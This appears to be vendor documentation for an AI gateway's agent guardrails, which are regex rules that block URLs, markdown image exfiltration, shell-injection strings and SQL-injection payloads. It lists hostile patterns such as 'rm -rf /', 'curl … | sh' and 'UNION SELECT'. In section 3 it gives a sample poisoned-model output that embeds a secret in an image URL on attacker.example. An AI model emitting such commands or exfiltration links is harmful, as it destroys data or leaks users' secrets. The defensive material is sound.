Agentic guardrails - OrcaRouter

When a model drives tools, the dangerous strings hide in plain content: a URL the agent is about to fetch, a markdown image the client will auto-load, a rm -rf / the model echoes into a shell tool, a UNION SELECT it emits for a SQL runner to execute. A content policy that only thinks about PII or secrets misses all four. The Agent preset category exists for exactly this shape — deterministic regex rules that block the request or response before a downstream tool ever acts on it. This is a focused landing for the agentic use case. For the complete guardrail engine — every rule type, field, stage, and route — see the Guardrails reference.

1. Why agent guardrails are a distinct surface

A guardrail screens content — the text in the request and the text in the response. For an agent, that text becomes an action: the URL gets fetched, the markdown gets rendered, the shell line gets run, the SQL gets executed. So the same block / mask engine you use for PII does double duty here — it stops a payload at the gateway before the agent’s tool layer can turn it into a side effect. The Agent category ships four presets, each one regex rule with action block, split across the two stages:

URL Filter — input, block

Blocks any http(s) URL on the request. Use it for agent flows where outbound URLs must be allowlisted rather than open. The seeded pattern matches any URL; edit the regex to permit specific domains.

Markdown Image Block — output, block

Blocks markdown image embeds (![alt](url)) in the model’s response. Defends against image-rendering exfiltration on clients that auto-load remote images — a classic data-leak channel where a rendered image URL smuggles data out.

Tool Call Shell Block — input, block

Blocks obvious shell-injection patterns in the request (rm -rf /, curl … | sh, wget … | bash, sudo escalation). Use it for agent flows that may forward user input into a shell tool.

SQL Injection in Output — output, block

Blocks model responses that carry classic SQL-injection payloads (UNION SELECT, OR 1=1, DROP TABLE, comment terminators). Defense-in-depth for tools that auto-execute SQL the model produced.

Two presets screen input, two screen output. URL Filter and Tool Call Shell Block fire on the request — before the model runs, before any quota is metered. Markdown Image Block and SQL Injection in Output fire on the response — after the model answers, before the content reaches your client or its tool layer. Knowing which stage a risk lives on is the whole game; see Input stage and Output stage.

2. Apply an agent guardrail in the console

Every step here is a console action on the hosted gateway under your own session. Creating and editing guardrails requires Developer+ in the workspace. Only the final /v1/* call uses an sk-orca-... relay key — the guardrail itself is configured entirely in the console.

Open the template

In the console, open Guardrails, click the New guardrail split-button, and pick a preset from the Agent template category — e.g. Markdown Image Block. It seeds the single regex block rule at the right stage.

Name and save

Give it a name (≤ 64 chars), e.g. agent-rails, and save. A preset is a seed, not a lock — add the other three Agent rules or edit the regex freely afterward (see §4).

Test it in the sandbox

Open the Test tab inside the editor, paste a sample, pick the matching stage, and run the current policy locally — no upstream call, no quota (see §3).

Attach a key

Edit an API key and pick agent-rails from the Guardrail dropdown (sets guardrail_id on the key), or mark it the workspace default. See Attach to a key and Account default.

3. Prove it before you attach

Prove the rule fires before any key points at it. Open the Test tab, pick the output stage, and paste a response that an attacker-poisoned page might have coaxed the model into emitting:

Here is the result: ![status](https://attacker.example/track?d=secret)

The sandbox evaluates the current policy locally — nothing is sent upstream, nothing is metered — and returns the block verdict naming the rule that fired. For an A/B grid against a corpus of adversarial and benign samples, the Eval harness lives one tab over.

4. Compose and tune the rules

The four presets are seeds. The common move is to combine them into one agent-rails guardrail and tighten each regex to your stack:

Allowlist URLs

Start from URL Filter, then edit the regex so it blocks every URL except your sanctioned domains — invert the match to an allowlist instead of a blanket block.

Author your own detectors

Add a regex rule for any payload shape your tools care about — RE2 patterns, linear-time, no backreferences. Patterns compile once and cache across requests.

Mix Agent rules with the rest of the engine in one guardrail. Pair them with a PII Shield mask rule or a Secrets Blocker input block — one policy can carry every rule type and the engine folds them into a single verdict. See Actions for block vs. mask vs. flag.

5. What a block looks like

Every Agent preset uses the block action. A blocked request returns HTTP 400 with error code guardrail_blocked and a message naming the guardrail and the rule that fired:

{
  "error": {
    "code": "guardrail_blocked",
    "message": "request blocked by guardrail \"agent-rails\""
  }
}

A blocked request costs no quota — an input-stage block (URL Filter, Tool Call Shell Block) fires before metering; an output-stage block (Markdown Image Block, SQL Injection in Output) refunds the pre-consumed quota after the response is rejected — and it is marked skip-retry, since re-running the same prompt would just block again. See the guardrail_blocked error.

Output block is enforced on streaming too. For the two output-stage Agent presets, block holds both ways: on a non-streaming response the answer is screened before it returns, and on a streaming response a scanner cuts the stream mid-flight before any blocked content reaches the client. See Streaming coverage.

6. Guardrails are content; the firewall is tool calls

Agent guardrails are a strong first layer, but they reason about strings, not tool semantics. They block a shell line in the content — they do not understand that the model emitted a structured tool_call to a destructive tool, or that an outbound request is heading to a metadata IP. That tool-call layer is the Firewall: it evaluates the model’s emitted tool_calls, MCP tools/call, and outbound egress with verdicts like allow / audit / deny / pending_approval. The two compose — guardrails screen the text, the firewall governs the action.

Firewall

Govern the model’s emitted tool calls, MCP calls, and egress with allow / audit / deny / approval verdicts.

Guardrails vs. Firewall

When to reach for a content guardrail vs. a tool-call firewall — and how to run both.

Securing AI agents

The full agent control stack: content, tools, MCP, and egress.

Excessive agency

The threat these rails address — an agent that does more than it should.

7. See what fired

Every rule that fires records a match — rule type, action, stage, and a detail string — surfaced in the workspace Matches feed. The matched substring itself is recorded only when Log raw content is on, which is off by default. Group and filter the feed by guardrail, rule type, and action to watch your agent-rule hit rate and tune false positives. See Matches feed, Logging & privacy, and Tune false positives.

8. Where to go next

Output-stage rules

How response screening works for Markdown Image Block and SQL Injection in Output.

Regex detectors

Author your own RE2 patterns to extend the Agent rules.

Data exfiltration

The exfil channel Markdown Image Block closes.

Dangerous tool calls

Why a content rail alone isn’t enough — pair it with the firewall.

Agent guardrails keep dangerous strings out of the content an agent sends and receives. To govern the actions an agent takes — the tool calls, MCP calls, and egress themselves — move up to the Firewall and read the securing AI agents baseline. For the complete guardrail engine, see the Guardrails reference.

​1. Why agent guardrails are a distinct surface

​2. Apply an agent guardrail in the console

​3. Prove it before you attach

​4. Compose and tune the rules

Allowlist URLs

Author your own detectors

​5. What a block looks like

​6. Guardrails are content; the firewall is tool calls

Firewall

Guardrails vs. Firewall

Securing AI agents

Excessive agency

​7. See what fired

​8. Where to go next

Output-stage rules

Regex detectors

Data exfiltration

Dangerous tool calls

1. Why agent guardrails are a distinct surface

2. Apply an agent guardrail in the console

3. Prove it before you attach

4. Compose and tune the rules

5. What a block looks like

6. Guardrails are content; the firewall is tool calls

7. See what fired

8. Where to go next